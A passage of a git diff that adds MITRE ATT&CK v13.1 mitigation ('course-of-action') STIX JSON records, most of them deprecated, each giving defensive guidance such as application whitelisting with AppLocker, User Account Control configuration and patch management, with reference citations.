(Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2ace01f8-67c8-43eb-b7b1-a7b9f1fe67e1.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2ace01f8-67c8-43eb-b7b1-a7b9f1fe67e1.json new file mode 100644 index 0000000000000000000000000000000000000000..6a650d3d29c414be16053893245faed32500a3f9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2ace01f8-67c8-43eb-b7b1-a7b9f1fe67e1.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--66c16181-7ca0-4f8f-b444-eaba86636777", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--2ace01f8-67c8-43eb-b7b1-a7b9f1fe67e1", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1083", + "url": "https://attack.mitre.org/mitigations/T1083", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.120Z", + "name": "File and Directory Discovery Mitigation", + "description": "File system activity is a common part of an operating system, so it is unlikely that mitigation would be appropriate for this technique. It may still be beneficial to identify and block unnecessary system utilities or potentially malicious software by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2c2ad92a-d710-41ab-a996-1db143bb4808.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2c2ad92a-d710-41ab-a996-1db143bb4808.json new file mode 100644 index 0000000000000000000000000000000000000000..a47068b2e1ea5ce0a7154502c2fdb1e3971bbc10 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2c2ad92a-d710-41ab-a996-1db143bb4808.json @@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--696b931c-f211-4869-9eed-fe5ce492bcf3", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--2c2ad92a-d710-41ab-a996-1db143bb4808", + "type": "course-of-action", + "created": "2019-06-11T17:14:35.170Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1052", + "url": "https://attack.mitre.org/mitigations/M1052" + } + ], + "modified": "2020-03-31T13:49:49.636Z", + "name": "User Account Control", + "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2c3ce852-06a2-40ee-8fe6-086f6402a739.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2c3ce852-06a2-40ee-8fe6-086f6402a739.json new file mode 100644 index 0000000000000000000000000000000000000000..a6d3ed9962994759497fd7530f85b13a71164b3a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2c3ce852-06a2-40ee-8fe6-086f6402a739.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--3aa4a96c-05af-4e94-8867-7026f210c20c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--2c3ce852-06a2-40ee-8fe6-086f6402a739", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1062", + "external_id": "T1062" + } + ], + "modified": "2019-07-24T19:37:57.004Z", + "name": "Hypervisor Mitigation", + "description": "Prevent adversary access to privileged accounts necessary to install a hypervisor.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2d704e56-e689-4011-b989-bf4e025a8727.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2d704e56-e689-4011-b989-bf4e025a8727.json new file mode 100644 index 0000000000000000000000000000000000000000..1c782fae900358f1c84f45d1ad73780e9f944434 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2d704e56-e689-4011-b989-bf4e025a8727.json @@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--a4c8714e-d792-40ce-b3c1-84ab7fd749e9", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--2d704e56-e689-4011-b989-bf4e025a8727", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1150", + "external_id": "T1150" + } + ], + "modified": "2019-07-25T11:25:29.091Z", + "name": "Plist Modification Mitigation", + "description": "Prevent plist files from being modified by users by making them read-only.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3.json new file mode 100644 index 0000000000000000000000000000000000000000..bb4fddb65bd9a97efe34d881e5732a8d2e8c068f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3.json @@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--53c53bb1-fb6e-423a-ab76-e5403fa95a59", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-31T17:27:28.395Z", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "type": "course-of-action", + "id": "course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1028", + "external_id": "M1028" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--308855d1-078b-47ad-8d2a-8f9b2713ffb5.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--308855d1-078b-47ad-8d2a-8f9b2713ffb5.json new file mode 100644 index 0000000000000000000000000000000000000000..9c5b39cebac3fff1d0e72796d7ae1a42fbb28483 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--308855d1-078b-47ad-8d2a-8f9b2713ffb5.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--3ce257af-63d4-41d5-a4f5-8556f222bdb7", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--308855d1-078b-47ad-8d2a-8f9b2713ffb5", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1077", + "url": "https://attack.mitre.org/mitigations/T1077", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.710Z", + "name": "Windows Admin Shares Mitigation", + "description": "Do not reuse local administrator account passwords across systems. Ensure password complexity and uniqueness such that the passwords cannot be cracked or guessed. Deny remote use of local admin credentials to log into systems. Do not allow domain user accounts to be in the local Administrators group multiple systems.\n\nIdentify unnecessary system utilities or potentially malicious software that may be used to leverage SMB and the Windows admin shares, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--313c8b20-4d49-40c1-9ac0-4c573aca28f3.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--313c8b20-4d49-40c1-9ac0-4c573aca28f3.json new file mode 100644 index 0000000000000000000000000000000000000000..529413120a54cff6171da600dec6aae0d935698d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--313c8b20-4d49-40c1-9ac0-4c573aca28f3.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--0f691191-9623-46a7-8dc7-0e3ddcb71dcb", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--313c8b20-4d49-40c1-9ac0-4c573aca28f3", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1004", + "url": "https://attack.mitre.org/mitigations/T1004", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + } + ], + "modified": "2020-01-17T16:45:24.244Z", + "name": "Winlogon Helper DLL Mitigation", + "description": "Limit the privileges of user accounts so that only authorized administrators can perform Winlogon helper changes.\n\nIdentify and block potentially malicious software that may be executed through the Winlogon helper process by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--337172b1-b003-4034-8a3f-1d89a71da628.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--337172b1-b003-4034-8a3f-1d89a71da628.json new file mode 100644 index 0000000000000000000000000000000000000000..757e953c4214af9b76a68dbfd1a3098e973b4877 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--337172b1-b003-4034-8a3f-1d89a71da628.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--69f68d70-643f-4d40-9575-a4635b6ef692", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--337172b1-b003-4034-8a3f-1d89a71da628", + "type": "course-of-action", + "created": "2019-04-12T14:59:36.522Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://attack.mitre.org/mitigations/T1494", + "source_name": "mitre-attack", + "external_id": "T1494" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2021-08-23T20:25:21.495Z", + "name": "Runtime Data Manipulation Mitigation", + "description": "Identify critical business and system processes that may be targeted by adversaries and work to secure those systems against tampering. Prevent critical business and system processes from being replaced, overwritten, or reconfigured to load potentially malicious code. Identify potentially malicious software and audit and/or block it by using whitelisting(Citation: Beechey 2010) tools, like AppLocker,(Citation: Windows Commands JPCERT)(Citation: NSA MS AppLocker) or Software Restriction Policies(Citation: Corio 2008) where appropriate.(Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--34d6a2ef-370e-4d21-a34b-6208b7c78f31.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--34d6a2ef-370e-4d21-a34b-6208b7c78f31.json new file mode 100644 index 0000000000000000000000000000000000000000..b72df83dc8c6e704b8400aa63912e01deeac4193 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--34d6a2ef-370e-4d21-a34b-6208b7c78f31.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--5f16d660-0cd7-4f8c-973b-6d88b6c4eeb1", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--34d6a2ef-370e-4d21-a34b-6208b7c78f31", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1186", + "external_id": "T1186" + }, + { + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "source_name": "Beechey 2010" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://www.iad.gov/iad/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "source_name": "Corio 2008" + }, + { + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "source_name": "TechNet Applocker vs SRP" + } + ], + "modified": "2021-08-23T20:25:19.742Z", + "name": "Process Doppelg\u00e4nging Mitigation", + "description": "This type of attack technique cannot be easily mitigated with preventive controls or patched since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate process-loading mechanisms from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.\n\nAlthough Process Doppelg\u00e4nging may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--34efb2fd-4dc2-40d4-a564-0c147c85034d.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--34efb2fd-4dc2-40d4-a564-0c147c85034d.json new file mode 100644 index 0000000000000000000000000000000000000000..676105be14614caa4f710622720203c3f3a88ba6 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--34efb2fd-4dc2-40d4-a564-0c147c85034d.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--92cdfb6d-83a2-4c17-9093-3103442618ab", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--34efb2fd-4dc2-40d4-a564-0c147c85034d", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1107", + "url": "https://attack.mitre.org/mitigations/T1107", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.685Z", + "name": "File Deletion Mitigation", + "description": "Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to delete files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--37a3f3f5-76e6-43fe-b935-f1f494c95725.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--37a3f3f5-76e6-43fe-b935-f1f494c95725.json new file mode 100644 index 0000000000000000000000000000000000000000..17db0ab856a1b903b40fe55cf9bb5d729fd7cd89 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--37a3f3f5-76e6-43fe-b935-f1f494c95725.json @@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--5f619408-f03b-42c1-9a8f-2b4cd4d7fcfa", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--37a3f3f5-76e6-43fe-b935-f1f494c95725", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1211", + "external_id": "T1211" + }, + { + "url": "https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/", + "description": "Goodin, D. (2017, March 17). Virtual machine escape fetches $105,000 at Pwn2Own hacking contest - updated. Retrieved March 12, 2018.", + "source_name": "Ars Technica Pwn2Own 2017 VM Escape" + }, + { + "url": "https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/", + "description": "Nunez, N. (2017, August 9). Moving Beyond EMET II \u2013 Windows Defender Exploit Guard. Retrieved March 12, 2018.", + "source_name": "TechNet Moving Beyond EMET" + }, + { + "url": "https://en.wikipedia.org/wiki/Control-flow_integrity", + "description": "Wikipedia. (2018, January 11). Control-flow integrity. Retrieved March 12, 2018.", + "source_name": "Wikipedia Control Flow Integrity" + } + ], + "modified": "2019-07-24T19:25:39.532Z", + "name": "Exploitation for Defense Evasion Mitigation", + "description": "Update software regularly by employing patch management for internal enterprise endpoints and servers. Develop a robust cyber threat intelligence capability to determine what types and levels of threat may use software exploits and 0-days against a particular organization. Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing, if available. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)\n\nSecurity applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility and may not work for software targeted for defense evasion.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--383caaa3-c46a-4f61-b2e3-653eb132f0e7.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--383caaa3-c46a-4f61-b2e3-653eb132f0e7.json new file mode 100644 index 0000000000000000000000000000000000000000..122d5e4bc88a2a2ed4966e2f8da71b30b6048cf7 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--383caaa3-c46a-4f61-b2e3-653eb132f0e7.json @@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--67db26ba-1dab-4bfd-bf65-17edc827d769", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--383caaa3-c46a-4f61-b2e3-653eb132f0e7", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1114", + "url": "https://attack.mitre.org/mitigations/T1114", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": 